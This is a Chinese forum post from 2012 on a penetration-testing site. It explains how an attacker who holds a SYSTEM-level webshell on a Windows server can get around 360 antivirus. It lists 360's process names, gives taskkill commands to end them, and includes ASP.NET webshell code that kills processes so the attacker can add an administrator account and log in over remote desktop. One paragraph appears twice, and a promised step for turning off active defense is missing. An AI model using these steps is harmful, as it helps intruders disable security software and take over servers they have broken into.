中国网络渗透测试联盟

标题: 服务器system权限webshell无法添加账户突破360方法 [打印本页]

作者: admin 时间: 2012-11-21 13:42
标题: 服务器system权限webshell无法添加账户突破360方法
webshell有system权限，无法添加administrators用户，最后无法成功连接3389,这一般都是杀毒软件引起了,说下突破360的方法

先查看进程:tasklist

然后杀掉进程:taskkill /im 进程名.exe /f

这些是360的进程：360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe

然后关掉360的主动防御，方法：

Windows下Apache+PHP的特殊性，导致很多php站的webshell有SYSTEM的权限，所以结束360简直易如反掌啊。
即使不是SYSTEM，也有办法的，例如ASPX，asp.net有个操纵进程的功能。看代码（直接从webshell上面拔下来的）：

Windows下Apache+PHP的特殊性，导致很多php站的webshell有SYSTEM的权限，所以结束360简直易如反掌啊。
即使不是SYSTEM，也有办法的，例如ASPX，asp.net有个操纵进程的功能。看代码（直接从webshell上面拔下来的）：

protected void kp_Click(object sender, EventArgs e)
{
Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
{
try
{
kp1.Kill();
Response.Write(“<script>alert(‘Killed’);location.href=’?'</” + “script>”);
ListBox1.Items.Clear();
}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
}
}
}
asp.net的这一个kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)